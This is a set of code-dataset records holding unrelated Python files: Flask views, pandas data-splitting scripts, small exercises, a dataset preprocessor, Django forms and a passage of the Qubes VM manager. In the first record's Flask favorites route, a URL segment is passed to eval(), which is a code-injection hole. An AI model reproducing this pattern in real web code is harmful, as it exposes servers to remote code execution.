render_template('guilds.html', **locals())\n\n@app.route('/emblems')\n@app.route('/emblems/<int:emblem_id>')\ndef emblems(emblem_id=None):\n if emblem_id is not None:\n emblem = Emblem.get(Emblem.id==emblem_id)\n else:\n emblem = None\n emblems = Emblem.select()\n\n return render_template('emblems.html', **locals())\n\n\nresponse = {\n 'success': False,\n 'errors': []\n}\n\n@app.route('/api/favorite/<action>/<class_name>/<int:id>')\ndef favorite(class_name, action, id):\n fav_cookie = request.cookies.get('favorites')\n\n if fav_cookie:\n favorites = json.loads(fav_cookie)\n else:\n favorites = {}\n\n try:\n obj = eval(class_name.capitalize()).get(id=id)\n\n if action == 'remove':\n if class_name in favorites and id in favorites[class_name]:\n favorites[class_name].remove(id)\n response['success'] = True\n else:\n response['errors'].append(\"Class: '%s' or %s id: %d not in favorites list!\" % (class_name, class_name, id))\n else:\n if class_name not in favorites:\n favorites[class_name] = []\n\n if id not in favorites[class_name]:\n favorites[class_name].append(id)\n response['success'] = True\n else:\n response['errors'].append(\"Already favorited %s %d\" % (class_name, id))\n\n response['favorites'] = favorites\n except:\n response['errors'].append(\"Error initializing class: '%s' with id: %d\" % (class_name, id))\n\n resp = jsonify(response)\n\n if response['success']:\n resp.set_cookie('favorites', json.dumps(favorites))\n\n return resp\n","repo_name":"5290charlie/gw2","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33904337248","text":"import os\nimport pandas as pd\n\n\ndef remove_duplicates(x):\n \"\"\"\n Remove duplicates from dataframe x\n\n This function will remove duplicate values from \n the original dataframe\n\n Return a set\n \"\"\"\n x = x.apply(lambda x: x.split(\", \"))\n x = x.explode()\n x = x.drop_duplicates()\n return set(x)\n\n\ndef categorize_transportations(transportations):\n \"\"\"\n Categorize transportations values by their keyword.\n\n Value with string Bandara will be categorized as airport,\n Value with string Terminal will be categorized as bus_station,\n Value with string Stasiun will 
be categorized as train_station.\n\n Return dataframes of categorized transportation\n \"\"\"\n airports, bus_stations, train_stations = [], [], []\n\n # loop through set_of_transportation and\n # add value to corresponding variable\n # according to their keyword\n set_of_transportations = remove_duplicates(transportations)\n for x in set_of_transportations:\n keyword = x.split()[0]\n if keyword == \"Bandara\":\n airports.append(x)\n elif keyword == \"Terminal\":\n bus_stations.append(x)\n elif keyword == \"Stasiun\":\n train_stations.append(x)\n\n return pd.DataFrame(data=airports, columns=[\"airport\"]), pd.DataFrame(data=bus_stations, columns=[\"bus_station\"]), pd.DataFrame(data=train_stations, columns=[\"train_station\"])\n\n\ndef explode_datasets(df, idx, col):\n \"\"\"\n Split cell with string that contains multiple data\n By using the explode method provided by pandas\n \"\"\"\n for x in col:\n if x:\n try:\n df[x] = df[x].apply(lambda x: x.split(\", \"))\n except AttributeError:\n df[x] = df[x].apply(lambda x: str(x).split(\", \"))\n\n return df.set_index(idx).apply(pd.Series.explode).reset_index()\n\n\n# read raw dataset\ndir_path = os.getcwd()\nraw_dataset = pd.read_excel(dir_path + \"/datasets/raw_dataset.xlsx\")\n\n# create data frame for knowledge graph entities\nmuseums = raw_dataset.filter([\n \"name\",\n \"address\",\n \"phone_number\",\n \"email\", \"website\",\n \"facebook\",\n \"twitter\",\n \"instagram\",\n \"longitude\",\n \"latitude\"], axis=1)\n\ntickets_1 = raw_dataset.filter([\"ticket_1\"], axis=1).rename(columns={\"ticket_1\":\"ticket\"})\ntickets_2 = raw_dataset.filter([\"ticket_2\"], axis=1).dropna().rename(columns={\"ticket_2\":\"ticket\"})\ntickets = tickets_1.append(tickets_2)\n\n# categorize categorical dataframe\nairports, bus_stations, train_stations = categorize_transportations(\n raw_dataset[\"public_transportation\"])\n\n# remove duplicate data from entities\ncity = raw_dataset[\"city\"].drop_duplicates(inplace=False).copy()\ncategory = raw_dataset[\"category\"].drop_duplicates(inplace=False).copy()\n\nschedule = list(remove_duplicates(raw_dataset[\"schedule_1\"].dropna()))\nschedule = pd.DataFrame(data=schedule, columns=[\"schedule\"])\n\nticket = list(remove_duplicates(tickets[\"ticket\"]))\nticket = pd.DataFrame(data=ticket, columns=[\"ticket\"])\n\n# create dataframe for knowledge graph location relation\nmuseum_location = raw_dataset.filter([\"name\", \"city\"], axis=1)\n\n# create dataframe for knowledge graph museum category relation\nmuseum_category = raw_dataset.filter([\"name\", \"category\"], axis=1)\n\n# create dataframe for knowledge graph transportation relation\nmuseum_transportation = raw_dataset.filter(\n [\"name\", \"public_transportation\", \"distance_to_museum\"], axis=1)\nmuseum_transportation = explode_datasets(museum_transportation, [\"name\"], [\n \"public_transportation\", \"distance_to_museum\"])\n\n# create dataframe for knowledge graph ticket category relation\nmuseum_ticket_1 = raw_dataset.filter(\n [\"name\", \"ticket_1\", \"ticket_price_1\"], axis=1)\nmuseum_ticket_1 = explode_datasets(museum_ticket_1, [\"name\"], [\n \"ticket_1\", \"ticket_price_1\"])\n\nmuseum_ticket_2 = raw_dataset.filter(\n [\"name\", \"ticket_name_2\", \"ticket_2\", \"ticket_price_2\"], axis=1)\nmuseum_ticket_2.dropna(inplace=True, subset=[\"ticket_name_2\"])\nmuseum_ticket_2 = explode_datasets(\n museum_ticket_2, [\"name\", \"ticket_name_2\"], [\"ticket_2\", \"ticket_price_2\"])\n\n# create dataframe for knowledge graph schedule category 
relation\nmuseum_schedule_1 = raw_dataset.filter(\n [\"name\", \"schedule_1\", \"schedule_name_1\", \"open_1\", \"closed_1\"], axis=1)\nmuseum_schedule_1 = explode_datasets(museum_schedule_1, [\n \"name\", \"schedule_name_1\", \"open_1\", \"closed_1\"], [\"schedule_1\"])\n\nmuseum_schedule_2 = raw_dataset.filter(\n [\"name\", \"schedule_2\", \"schedule_name_2\", \"open_2\", \"closed_2\"], axis=1)\nmuseum_schedule_2.dropna(inplace=True, subset=[\"schedule_2\"])\nmuseum_schedule_2 = explode_datasets(museum_schedule_2, [\n \"name\", \"schedule_name_2\", \"open_2\", \"closed_2\"], [\"schedule_2\"])\n\nmuseum_schedule_3 = raw_dataset.filter(\n [\"name\", \"schedule_3\", \"schedule_name_3\", \"open_3\", \"closed_3\"], axis=1)\nmuseum_schedule_3.dropna(inplace=True, subset=[\"schedule_3\"])\nmuseum_schedule_3 = explode_datasets(museum_schedule_3, [\n \"name\", \"schedule_name_3\", \"open_3\", \"closed_3\"], [\"schedule_3\"])\n\n# write all entities and relations to csv\nmuseums.to_csv(dir_path + \"/datasets/museum.csv\", index=False)\ncity.to_csv(dir_path + \"/datasets/city.csv\", index=False)\ncategory.to_csv(dir_path + \"/datasets/category.csv\", index=False)\nairports.to_csv(dir_path + \"/datasets/airport.csv\", index=False)\nbus_stations.to_csv(dir_path + \"/datasets/bus_station.csv\", index=False)\ntrain_stations.to_csv(dir_path + \"/datasets/train_station.csv\", index=False)\nticket.to_csv(dir_path + \"/datasets/ticket.csv\", index=False)\nschedule.to_csv(dir_path + \"/datasets/schedule.csv\", index=False)\nmuseum_location.to_csv(\n dir_path + \"/datasets/museum_location.csv\", index=False)\nmuseum_category.to_csv(\n dir_path + \"/datasets/museum_category.csv\", index=False)\nmuseum_transportation.to_csv(\n dir_path + \"/datasets/museum_transportation.csv\", index=False)\nmuseum_ticket_1.to_csv(\n dir_path + \"/datasets/museum_ticket_1.csv\", index=False)\nmuseum_ticket_2.to_csv(\n dir_path + \"/datasets/museum_ticket_2.csv\", index=False)\nmuseum_schedule_1.to_csv(\n dir_path + \"/datasets/museum_schedule_1.csv\", index=False)\nmuseum_schedule_2.to_csv(\n dir_path + \"/datasets/museum_schedule_2.csv\", index=False)\nmuseum_schedule_3.to_csv(\n dir_path + \"/datasets/museum_schedule_3.csv\", index=False)\n","repo_name":"reykim7854/museum_recsys_chatbot","sub_path":"scripts/typedb_scripts/split_dataset.py","file_name":"split_dataset.py","file_ext":"py","file_size_in_byte":6383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10941133421","text":"## My solution\ndef is_isogram(string):\n #your code here\n if type(string) != str:\n raise TypeError('Argument should be a string')\n\n elif string == \"\":\n return True\n else:\n string = string.lower()\n repeat = 0\n for char in string:\n if string.count(char) > 1:\n repeat += 1\n if repeat > 0:\n return False\n else:\n return True\n\n#Best Practice\ndef isogram(n):\n if not isinstance(n, str):\n return False\n elif len(n) < 1:\n return True\n n = n.lower()\n if len(n) == len(set(n)): ## we check if the length of the input is equal to the length of the set(n). \n return True\n else:\n return False\n\n# The function set() converts a collection or a sequence or an iterator object into a set. \n# For example: set('lists') returns {'s', 't', 'l', 'i'}, as you can see the letter 's' which appears twice in 'lists', does not appear in the set. 
\n# This is useful to check if the length of the set is equal to the length of the input, if there is a letter which appears twice in the input the condition is False.\n","repo_name":"sandyhsia/codeWarwww","sub_path":"string中的重复字符.py","file_name":"string中的重复字符.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22638700548","text":"# 출석번호가 1,2,3,4. 앞에 100을 붙이기로함. -> 101, 102, 103, 104.\nstudents = [1, 2, 3, 4]\nstudents = [i + 100 for i in students]\nprint(students) # [101, 102, 103, 104]\n\n# 학생이름을 길이로 변환\nstudents = [\"karina\", \"winter\", \"ningning\"]\nstudents = [len(i) for i in students]\nprint(students) # [6, 6, 8]\n\n# 학생이름을 대문자로 변환\nstudents = [\"karina\", \"winter\", \"ningning\"]\nstudents = [i.upper() for i in students]\nprint(students) # ['KARINA', 'WINTER', 'NINGNING']\n","repo_name":"Hanseul516/Python","sub_path":"Study/14_한줄for.py","file_name":"14_한줄for.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74986490826","text":"import turtle, random\r\nfrom worksheet_math_squares_line import random_color, square\r\n \r\ndef roots(a, b, c):\r\n '''\r\n roots determines and prints the roots of a quadratic equation with \r\n coefficients a, b, and c. It returns None.\r\n '''\r\n discriminant = b**2 - 4 * a * c\r\n print(\"discriminant:\", discriminant)\r\n root_disc = math.sqrt(discriminant)\r\n root1 = (-b + root_disc) / (2 * a)\r\n root2 = (-b - root_disc) / (2 * a)\r\n print(root1, root2)\r\n \r\ndef main():\r\n '''\r\n Draw a number determined by the user of \r\n squares of random color in random places.\r\n '''\r\n azt = turtle.Turtle()\r\n turtle.bgcolor('black')\r\n azt.shape('turtle')\r\n azt.speed(0)\r\n azt.pensize(5)\r\n for i in range(100):\r\n random_color(azt)\r\n x = random.randrange(701) - 400\r\n y = random.randrange(501) - 300\r\n azt.penup()\r\n azt.goto(x, y)\r\n azt.pendown()\r\n azt.begin_fill()\r\n square(azt, random.randint(1, 100))\r\n azt.end_fill()\r\n \r\n turtle.getscreen().exitonclick()\r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Gavand/Python","sub_path":"py6/random_squares_roots.py","file_name":"random_squares_roots.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"33949262763","text":"# image_id class_id super_class_id super_class_name path filename\n# 1 1 1 bicycle bicycle_final 111085122871_0.JPG\nimport os\nimport shutil\n\ndef mkdir(dir_path, dir_name, forced_remove=False):\n\tnew_dir = '{}/{}'.format(dir_path,dir_name)\n\tif forced_remove and os.path.isdir( new_dir ):\n\t\tshutil.rmtree( new_dir )\n\tif not os.path.isdir( new_dir ):\n\t\tos.makedirs( new_dir )\n\ndef touch(file_path, file_name, forced_remove=False):\n\tnew_file = '{}/{}'.format(file_path,file_name)\n\tassert os.path.isdir( file_path ), ' \\\"{}\\\" does not exist.'.format(file_path)\n\tif forced_remove and os.path.isfile(new_file):\n\t\tos.remove(new_file)\n\tif not os.path.isfile(new_file):\n\t\topen(new_file, 'a').close()\n\ndef write_file(file_path, file_name, content, new_line=True, forced_remove_prev=False):\n\ttouch(file_path, file_name, forced_remove=forced_remove_prev)\n\twith open('{}/{}'.format(file_path, file_name), 'a') as f:\n\t\tf.write('{}'.format(content))\n\t\tif new_line:\n\t\t\tf.write('\\n')\n\t\tf.close()\n\ndef 
copy_file(src_path, src_file_name, dst_path, dst_file_name):\n\tshutil.copyfile('{}/{}'.format(src_path, src_file_name), '{}/{}'.format(dst_path,dst_file_name)) \n\ndef ls(dir_path):\n\treturn os.listdir(dir_path)\n \ndef get_dicts(raw_data_path, info_file_name):\n superclass_ids = list()\n images = dict()\n images_path = dict()\n\n for ix, (line) in enumerate(open('{}/{}'.format(raw_data_path, info_file_name))):\n if ix==0:\n continue\n image_id, class_id, superclass_id, path = line.split()\n file_path, file_name = os.path.split(path)\n if superclass_id not in superclass_ids:\n superclass_ids.append( superclass_id )\n images[superclass_id] = dict()\n \n if class_id not in images[superclass_id].keys():\n images[superclass_id][class_id] = list()\n\n images[superclass_id][class_id].append(image_id)\n images_path[image_id] = ( ('{}/{}'.format(raw_data_path, file_path), file_name) )\n \n return images_path, images, superclass_ids\n\ndef preprocess(data_mode, saving_path, images, images_path, super_class_ids, saving_points=(0., 1.) ):\n assert data_mode in ['train', 'val', 'test'], 'data_mode must be one of [\"train\", \"val\", \"test\"]'\n assert saving_points[0]<= saving_points[1] and saving_points[0]>=0. and saving_points[1]<=1. , '**** Error: 0. <= saving_point[0] <= saving_point[1] <= 1'\n \n mkdir(saving_path, data_mode)\n mkdir('{}/{}'.format(saving_path, data_mode), 'images')\n touch('{}/{}'.format(saving_path, data_mode), 'images_info.txt')\n touch('{}/{}'.format(saving_path, data_mode), 'super_class_ids.txt')\n for super_class_id in super_class_ids:\n write_file('{}/{}'.format(saving_path, data_mode), 'super_class_ids.txt', '{}'.format(super_class_id))\n\n for ix, (super_class_id) in enumerate(images.keys()):\n start_offset = int( len(images[super_class_id].keys()) * saving_points[0] )\n end_offset = int( len(images[super_class_id].keys()) * saving_points[1] )\n num_super_class_data = end_offset - start_offset\n # print(start_offset, end_offset, num_super_class_data)\n\n for jx, (class_id) in enumerate(images[super_class_id].keys()):\n if jx < start_offset:\n continue\n if jx > end_offset:\n break\n\n class_images = images[super_class_id][class_id]\n \n for kx, (image_id) in enumerate(class_images):\n image_path, image_name = images_path[image_id]\n copy_file(image_path, image_name, '{}/{}/images'.format(saving_path, data_mode), image_name)\n image_info = '{} {} {} {}'.format(super_class_id, class_id, image_id, image_name)\n write_file( '{}/{}'.format(saving_path, data_mode), 'images_info.txt', image_info )\n print('%s: super class: %s( %d/%d(%.2f%%) ), class: %s( %d/%d(%.2f%%) )' % (\n data_mode,\n super_class_id,\n ix+1,\n len(images.keys()),\n (ix+1) / len(images.keys()) * 100,\n class_id,\n jx-start_offset+1,\n num_super_class_data,\n (jx-start_offset+1)/(num_super_class_data)*100\n ), end='\\r'\n )\n print()\n\ndef _main():\n train_raw_datapath, train_info_file_name, train_saving_path, train_saving_points = ( 'Stanford_Online_Products', 'Ebay_train.txt', '.', (0., 0.8) )\n val_saving_path, val_saving_points = ( '.', (0.8, 1.) )\n test_raw_datapath, test_info_file_name, test_saving_path, test_saving_points = ( 'Stanford_Online_Products', 'Ebay_test.txt', '.', (0., 1.) 
)\n\n train_images_path, train_images, train_super_class_ids = get_dicts(train_raw_datapath, train_info_file_name)\n test_images_path, test_images, test_super_class_ids = get_dicts(test_raw_datapath, test_info_file_name)\n val_images, val_images_path, val_super_class_ids = (train_images, train_images_path, train_super_class_ids)\n\n preprocess('train', train_saving_path, train_images, train_images_path, train_super_class_ids, train_saving_points)\n preprocess('val', val_saving_path, val_images, val_images_path, val_super_class_ids, val_saving_points)\n preprocess('test', test_saving_path, test_images, test_images_path, test_super_class_ids, test_saving_points)\n\nif __name__ == \"__main__\":\n _main()\n\n","repo_name":"ahedayat/FastAP","sub_path":"datasets/standford_online_products/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"73395790344","text":"import calibrationClass as cc\nimport pixieBinParser as pp\n\nclass recon:\n\n def __init__(self, calibration=None):\n\n '''\n File: recontstructionClass.py\n Author: Anders Priest\n Description: This class should be used for mapping any number of events\n given a calibration object. The calibration will be used to map the\n events, both the positions and the energies, then store the data\n in histograms as well as in raw form.\n '''\n\n self.calibration = calibration\n\n def mapEvents(self, fname=None, folderName=None):\n\n if fname != None:\n\n prsr = pp.pixieParser(fname=fname,\n moduleNum=self.calibration.moduleNum,\n channelNum=self.calibration.channelNum)\n\n prsr.readBinFile()\n\n eventList = prsr.makeAndWriteEvents()\n\n for e in eventList:\n\n x = self.calibration.mapEvent(e=e)\n","repo_name":"appriest/proximity","sub_path":"RTDataProcessing/recontstructionClass.py","file_name":"recontstructionClass.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14418278531","text":"from django import forms\nfrom .widgets import SimpleMDE\nfrom .models import Post, Comment\n\n\nclass ArticleAdminModelForm(forms.ModelForm):\n markdown_text = forms.CharField(widget=SimpleMDE())\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Post\n fields = '__all__'\n widgets = {\n 'markdown_text':SimpleMDE(),\n }\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['name', 'email', 'content',]\n","repo_name":"simon-ding/django_blog","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20868780170","text":"import sys\nimport os\nimport os.path\nimport subprocess\nimport time\nfrom datetime import datetime, timedelta\nimport traceback\n\nfrom qubesadmin import Qubes\nfrom qubesadmin import exc\n\nfrom PyQt4 import QtGui # pylint: disable=import-error\nfrom PyQt4 import QtCore # pylint: disable=import-error\n\nfrom . import ui_qubemanager # pylint: disable=no-name-in-module\nfrom . import thread_monitor\nfrom . import table_widgets\nfrom . import settings\nfrom . import global_settings\nfrom . import restore\nfrom . import backup\nfrom . 
import log_dialog\nimport threading\n\nfrom qubesmanager.about import AboutDialog\n\n\nclass SearchBox(QtGui.QLineEdit):\n def __init__(self, parent=None):\n super(SearchBox, self).__init__(parent)\n self.focusing = False\n\n def focusInEvent(self, e): # pylint: disable=invalid-name\n super(SearchBox, self).focusInEvent(e)\n self.selectAll()\n self.focusing = True\n\n def mousePressEvent(self, e): # pylint: disable=invalid-name\n super(SearchBox, self).mousePressEvent(e)\n if self.focusing:\n self.selectAll()\n self.focusing = False\n\n\nclass VmRowInTable(object):\n # pylint: disable=too-few-public-methods\n\n def __init__(self, vm, row_no, table):\n self.vm = vm\n self.row_no = row_no\n # TODO: replace a various different widgets with a more generic\n # VmFeatureWidget or VMPropertyWidget\n\n table_widgets.row_height = VmManagerWindow.row_height\n table.setRowHeight(row_no, VmManagerWindow.row_height)\n\n self.type_widget = table_widgets.VmTypeWidget(vm)\n table.setCellWidget(row_no, VmManagerWindow.columns_indices['Type'],\n self.type_widget)\n table.setItem(row_no, VmManagerWindow.columns_indices['Type'],\n self.type_widget.table_item)\n\n self.label_widget = table_widgets.VmLabelWidget(vm)\n table.setCellWidget(row_no, VmManagerWindow.columns_indices['Label'],\n self.label_widget)\n table.setItem(row_no, VmManagerWindow.columns_indices['Label'],\n self.label_widget.table_item)\n\n self.name_widget = table_widgets.VmNameItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['Name'],\n self.name_widget)\n\n self.info_widget = table_widgets.VmInfoWidget(vm)\n table.setCellWidget(row_no, VmManagerWindow.columns_indices['State'],\n self.info_widget)\n table.setItem(row_no, VmManagerWindow.columns_indices['State'],\n self.info_widget.table_item)\n\n self.template_widget = table_widgets.VmTemplateItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['Template'],\n self.template_widget)\n\n self.netvm_widget = table_widgets.VmNetvmItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['NetVM'],\n self.netvm_widget)\n\n self.size_widget = table_widgets.VmSizeOnDiskItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['Size'],\n self.size_widget)\n\n self.internal_widget = table_widgets.VmInternalItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['Internal'],\n self.internal_widget)\n\n self.ip_widget = table_widgets.VmIPItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['IP'],\n self.ip_widget)\n\n self.include_in_backups_widget = \\\n table_widgets.VmIncludeInBackupsItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices[\n 'Backups'], self.include_in_backups_widget)\n\n self.last_backup_widget = table_widgets.VmLastBackupItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices[\n 'Last backup'], self.last_backup_widget)\n\n def update(self, update_size_on_disk=False):\n \"\"\"\n Update info in a single VM row\n :param update_size_on_disk: should disk utilization be updated? 
the\n widget will extract the data from VM object\n :return: None\n \"\"\"\n self.info_widget.update_vm_state(self.vm)\n if update_size_on_disk:\n self.size_widget.update()\n\n\nvm_shutdown_timeout = 20000 # in msec\nvm_restart_check_timeout = 1000 # in msec\n\n\nclass VmShutdownMonitor(QtCore.QObject):\n def __init__(self, vm, shutdown_time=vm_shutdown_timeout,\n check_time=vm_restart_check_timeout,\n and_restart=False, caller=None):\n QtCore.QObject.__init__(self)\n self.vm = vm\n self.shutdown_time = shutdown_time\n self.check_time = check_time\n self.and_restart = and_restart\n self.shutdown_started = datetime.now()\n self.caller = caller\n\n def restart_vm_if_needed(self):\n if self.and_restart and self.caller:\n self.caller.start_vm(self.vm)\n\n def check_again_later(self):\n # noinspection PyTypeChecker,PyCallByClass\n QtCore.QTimer.singleShot(self.check_time, self.check_if_vm_has_shutdown)\n\n def timeout_reached(self):\n actual = datetime.now() - self.shutdown_started\n allowed = timedelta(milliseconds=self.shutdown_time)\n\n return actual > allowed\n\n def check_if_vm_has_shutdown(self):\n vm = self.vm\n vm_is_running = vm.is_running()\n try:\n vm_start_time = datetime.fromtimestamp(float(vm.start_time))\n except (AttributeError, TypeError, ValueError):\n vm_start_time = None\n\n if vm_is_running and vm_start_time \\\n and vm_start_time < self.shutdown_started:\n if self.timeout_reached():\n reply = QtGui.QMessageBox.question(\n None, self.tr(\"Qube Shutdown\"),\n self.tr(\n \"The Qube <b>'{0}'</b> hasn't shutdown within the last \"\n \"{1} seconds, do you want to kill it?<br>\").format(\n vm.name, self.shutdown_time / 1000),\n self.tr(\"Kill it!\"),\n self.tr(\"Wait another {0} seconds...\").format(\n self.shutdown_time / 1000))\n if reply == 0:\n vm.kill()\n self.restart_vm_if_needed()\n else:\n self.shutdown_started = datetime.now()\n self.check_again_later()\n else:\n self.check_again_later()\n else:\n if vm_is_running:\n # Due to unknown reasons, Xen sometimes reports that a domain\n # is running even though its start-up timestamp is not valid.\n # Make sure that \"restart_vm_if_needed\" is not called until\n # the domain has been completely shut down according to Xen.\n self.check_again_later()\n return\n\n self.restart_vm_if_needed()\n\n\nclass VmManagerWindow(ui_qubemanager.Ui_VmManagerWindow, QtGui.QMainWindow):\n # pylint: disable=too-many-instance-attributes\n row_height = 30\n column_width = 200\n search = \"\"\n # suppress saving settings while initializing widgets\n settings_loaded = False\n columns_indices = {\"Type\": 0,\n \"Label\": 1,\n \"Name\": 2,\n \"State\": 3,\n \"Template\": 4,\n \"NetVM\": 5,\n \"Size\": 6,\n \"Internal\": 7,\n \"IP\": 8,\n \"Backups\": 9,\n \"Last backup\": 10,\n }\n\n def __init__(self, qubes_app, qt_app, parent=None):\n # pylint: disable=unused-argument\n super(VmManagerWindow, self).__init__()\n self.setupUi(self)\n\n self.manager_settings = QtCore.QSettings(self)\n\n self.qubes_app = qubes_app\n self.qt_app = qt_app\n\n self.searchbox = SearchBox()\n self.searchbox.setValidator(QtGui.QRegExpValidator(\n QtCore.QRegExp(\"[a-zA-Z0-9-]*\", QtCore.Qt.CaseInsensitive), None))\n self.searchContainer.addWidget(self.searchbox)\n\n self.connect(self.table, QtCore.SIGNAL(\"itemSelectionChanged()\"),\n self.table_selection_changed)\n\n self.table.setColumnWidth(0, self.column_width)\n\n self.sort_by_column = \"Type\"\n self.sort_order = QtCore.Qt.AscendingOrder\n\n self.vms_list = []\n self.vms_in_table = {}\n\n self.frame_width = 0\n 
self.frame_height = 0\n\n self.move(self.x(), 0)\n\n self.columns_actions = {\n self.columns_indices[\"Type\"]: self.action_vm_type,\n self.columns_indices[\"Label\"]: self.action_label,\n self.columns_indices[\"Name\"]: self.action_name,\n self.columns_indices[\"State\"]: self.action_state,\n self.columns_indices[\"Template\"]: self.action_template,\n self.columns_indices[\"NetVM\"]: self.action_netvm,\n self.columns_indices[\"Size\"]: self.action_size_on_disk,\n self.columns_indices[\"Internal\"]: self.action_internal,\n self.columns_indices[\"IP\"]: self\n .action_ip, self.columns_indices[\"Backups\"]: self\n .action_backups, self.columns_indices[\"Last backup\"]: self\n .action_last_backup\n }\n\n self.visible_columns_count = len(self.columns_indices)\n\n self.table.setColumnWidth(self.columns_indices[\"State\"], 80)\n self.table.setColumnWidth(self.columns_indices[\"Name\"], 150)\n self.table.setColumnWidth(self.columns_indices[\"Label\"], 40)\n self.table.setColumnWidth(self.columns_indices[\"Type\"], 40)\n self.table.setColumnWidth(self.columns_indices[\"Size\"], 100)\n self.table.setColumnWidth(self.columns_indices[\"Internal\"], 60)\n self.table.setColumnWidth(self.columns_indices[\"IP\"], 100)\n self.table.setColumnWidth(self.columns_indices[\"Backups\"], 60)\n self.table.setColumnWidth(self.columns_indices[\"Last backup\"], 90)\n\n self.table.horizontalHeader().setResizeMode(\n QtGui.QHeaderView.Interactive)\n self.table.horizontalHeader().setStretchLastSection(True)\n\n self.table.sortItems(self.columns_indices[self.sort_by_column],\n self.sort_order)\n\n self.context_menu = QtGui.QMenu(self)\n\n self.context_menu.addAction(self.action_settings)\n self.context_menu.addAction(self.action_editfwrules)\n self.context_menu.addAction(self.action_appmenus)\n self.context_menu.addAction(self.action_set_keyboard_layout)\n self.context_menu.addSeparator()\n\n self.context_menu.addAction(self.action_updatevm)\n self.context_menu.addAction(self.action_run_command_in_vm)\n self.context_menu.addAction(self.action_resumevm)\n self.context_menu.addAction(self.action_startvm_tools_install)\n self.context_menu.addAction(self.action_pausevm)\n self.context_menu.addAction(self.action_shutdownvm)\n self.context_menu.addAction(self.action_restartvm)\n self.context_menu.addAction(self.action_killvm)\n self.context_menu.addSeparator()\n\n self.context_menu.addAction(self.action_clonevm)\n self.context_menu.addAction(self.action_removevm)\n self.context_menu.addSeparator()\n\n self.context_menu.addMenu(self.logs_menu)\n self.context_menu.addSeparator()\n\n self.tools_context_menu = QtGui.QMenu(self)\n self.tools_context_menu.addAction(self.action_toolbar)\n self.tools_context_menu.addAction(self.action_menubar)\n\n self.connect(\n self.table.horizontalHeader(),\n QtCore.SIGNAL(\"sortIndicatorChanged(int, Qt::SortOrder)\"),\n self.sort_indicator_changed)\n self.connect(self.table,\n QtCore.SIGNAL(\"customContextMenuRequested(const QPoint&)\"),\n self.open_context_menu)\n self.connect(self.menubar,\n QtCore.SIGNAL(\"customContextMenuRequested(const QPoint&)\"),\n lambda pos: self.open_tools_context_menu(self.menubar,\n pos))\n self.connect(self.toolbar,\n QtCore.SIGNAL(\"customContextMenuRequested(const QPoint&)\"),\n lambda pos: self.open_tools_context_menu(self.toolbar,\n pos))\n self.connect(self.logs_menu, QtCore.SIGNAL(\"triggered(QAction *)\"),\n self.show_log)\n\n self.connect(self.searchbox,\n QtCore.SIGNAL(\"textChanged(const QString&)\"),\n self.do_search)\n\n self.table.setContentsMargins(0, 
0, 0, 0)\n        self.centralwidget.layout().setContentsMargins(0, 0, 0, 0)\n        self.layout().setContentsMargins(0, 0, 0, 0)\n\n        self.connect(self.action_menubar, QtCore.SIGNAL(\"toggled(bool)\"),\n                     self.showhide_menubar)\n        self.connect(self.action_toolbar, QtCore.SIGNAL(\"toggled(bool)\"),\n                     self.showhide_toolbar)\n\n        self.load_manager_settings()\n\n        self.fill_table()\n\n        self.counter = 0\n        self.update_size_on_disk = False\n        self.shutdown_monitor = {}\n\n    def load_manager_settings(self):\n        # visible columns\n        self.visible_columns_count = 0\n        for col in self.columns_indices:\n            col_no = self.columns_indices[col]\n            visible = self.manager_settings.value(\n                'columns/%s' % col,\n                defaultValue=\"true\")\n            self.columns_actions[col_no].setChecked(visible == \"true\")\n            self.visible_columns_count += 1\n\n        self.sort_by_column = str(\n            self.manager_settings.value(\"view/sort_column\",\n                                        defaultValue=self.sort_by_column))\n        self.sort_order = QtCore.Qt.SortOrder(\n            self.manager_settings.value(\"view/sort_order\",\n                                        defaultValue=self.sort_order))\n        self.table.sortItems(self.columns_indices[self.sort_by_column],\n                             self.sort_order)\n        if not self.manager_settings.value(\"view/menubar_visible\",\n                                           defaultValue=True):\n            self.action_menubar.setChecked(False)\n        if not self.manager_settings.value(\"view/toolbar_visible\",\n                                           defaultValue=True):\n            self.action_toolbar.setChecked(False)\n        self.settings_loaded = True\n\n    def get_vms_list(self):\n        return [vm for vm in self.qubes_app.domains]\n\n    def update_single_row(self, vm):\n        # this function should be used to update a row that already exists\n        # to add a row, one needs to use the update_table function - the\n        # whole table needs to be redrawn (and sorted)\n        if vm in self.qubes_app.domains:\n            self.vms_in_table[vm.qid].update()\n        else:\n            self.update_table()\n\n    def fill_table(self):\n        # save current selection\n        row_index = self.table.currentRow()\n        selected_qid = -1\n        if row_index != -1:\n            vm_item = self.table.item(row_index, self.columns_indices[\"Name\"])\n            if vm_item:\n                selected_qid = vm_item.qid\n\n        self.table.setSortingEnabled(False)\n        self.table.clearContents()\n        vms_list = 